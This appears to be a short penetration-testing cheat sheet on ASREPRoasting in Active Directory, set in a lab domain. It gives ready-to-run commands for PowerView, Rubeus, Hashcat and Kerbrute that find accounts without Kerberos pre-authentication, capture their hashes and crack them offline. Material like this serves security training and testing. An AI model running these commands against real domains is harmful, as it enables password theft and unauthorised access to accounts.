ASREPRoasting
ASREPRoasting is an attack that exploits user accounts in Active Directory that have Kerberos pre-authentication disabled. This allows an attacker to retrieve encrypted Ticket Granting Ticket (TGT) data, which can then be cracked offline to obtain plaintext passwords.
1. Enumerate Users with Pre-Authentication Not Required
Command:
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | flDescription: PowerView tool used to search for the DONT_REQ_PREAUTH value across user accounts in a target Windows domain. Performed from a Windows-based host.
2. Perform ASREPRoasting Attack with Rubeus
Command:
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcatDescription: Uses Rubeus to perform an ASREPRoasting attack and formats the output for Hashcat. Performed from a Windows-based host.
3. Crack Captured Hash with Hashcat
Command:
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txtDescription: Uses Hashcat to attempt to crack the captured ASREP hash using a wordlist (rockyou.txt). Performed from a Linux-based host.
4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute
Command:
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txtDescription: Enumerates users in a target Windows domain and automatically retrieves ASREP hashes for any users that do not require Kerberos pre-authentication. Performed from a Linux-based host.
Last updated